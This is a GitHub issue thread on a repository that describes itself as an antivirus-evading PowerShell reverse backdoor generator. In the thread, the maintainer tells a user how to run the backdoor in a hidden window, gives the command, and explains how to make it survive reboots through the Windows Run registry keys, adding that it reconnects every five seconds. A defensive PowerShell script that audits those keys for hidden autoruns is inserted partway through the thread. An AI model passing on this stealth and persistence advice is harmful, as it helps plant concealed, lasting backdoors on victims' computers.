Drew-Alleman / powershell-backdoor-generator

Reverse backdoor written in PowerShell and obfuscated with Python. It generates payloads for popular hacking devices like Flipper Zero and Hak5 USB Rubber Ducky, and changes its signature after every build to help avoid AV.
Apache License 2.0

Run background backdoor #2

Closed nomad231 closed 1 year ago

nomad231 commented 1 year ago

Hi,

When I run the backdoor, it's running in a PowerShell window. How can I run it in the background and persist it?

Thanks.

Drew-Alleman commented 1 year ago

Hello,

Let me first start by saying I don't condone doing illegal activity and I'm assuming you are doing this with proper permissions. To run the PowerShell script in a hidden background window you can use the command below in a CMD console (use the old Windows console, not the advanced terminal; it does not work).

PowerShell.exe -WindowStyle hidden -File backdoor.ps1


Now for the persistence. The USB ducky/flipper bindAndExecute payload uses the following Windows registry entry to maintain persistence after every reboot.

HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run

You can of course also use

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Open Regedit and go to the path you selected, then make a new entry following the one in the gif below. We are going to use the same command as before. (If it's hard to read, try clicking on the actual gif.)

Now after rebooting my PC I can confirm the test script is now running in the background with Process Hacker.

The PowerShell backdoor script will try to reconnect every 5 seconds if it loses connection to your PC. Please let me know if you have any other questions or issues.

Best, Drew Alleman
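From the defender's side, the two Run keys and the hidden-window command line named in the reply above are exactly what an autorun audit should look for. The following is an added example, not code from this repository or its author; the function names `Test-HiddenPowerShellCommand` and `Get-HiddenPowerShellAutorun` and the sample command lines are assumptions made for illustration.

```powershell
# Added example: audit the Run keys named in the thread for PowerShell autoruns
# that start with a hidden window. Function names are hypothetical.
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)

function Test-HiddenPowerShellCommand {
    # True when a command line launches PowerShell with -WindowStyle hidden.
    # Heuristic: also accepts shortened parameter names such as -w or -win.
    param([Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine)
    $isPowerShell = $CommandLine -match '(?i)\b(powershell|pwsh)(\.exe)?\b'
    $isHidden     = $CommandLine -match '(?i)[-/]w[a-z]*\s+hidden\b'
    return ($isPowerShell -and $isHidden)
}

function Get-HiddenPowerShellAutorun {
    # Reads every value under each Run key and returns the ones that match.
    param([string[]]$Path = $RunKeys)
    foreach ($keyPath in $Path) {
        $key = Get-Item -LiteralPath $keyPath -ErrorAction SilentlyContinue
        if (-not $key) { continue }   # key missing or not readable
        foreach ($name in $key.GetValueNames()) {
            $data = [string]$key.GetValue($name)
            if (Test-HiddenPowerShellCommand -CommandLine $data) {
                [pscustomobject]@{ Key = $keyPath; Name = $name; Command = $data }
            }
        }
    }
}

# Constructed sample command lines (not taken from a real host) to show
# what the matcher flags and what it ignores.
$samples = @(
    'PowerShell.exe -WindowStyle hidden -File backdoor.ps1',    # form used in the thread
    'powershell -w hidden -File C:\Users\Public\update.ps1',    # shortened parameter name
    'powershell.exe -File C:\Scripts\inventory.ps1',            # visible window, not flagged
    '"C:\Program Files\Vendor\agent.exe" --background'          # not PowerShell, not flagged
)
foreach ($s in $samples) {
    '{0,-5} {1}' -f (Test-HiddenPowerShellCommand -CommandLine $s), $s
}

# Audit the live registry of the machine this runs on.
Get-HiddenPowerShellAutorun | Format-List
```

A match is a lead to triage rather than a verdict: some legitimate management tooling also starts PowerShell hidden at logon, so check the referenced script and its owner before removing the value.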

nomad231 commented 1 year ago

Thanks.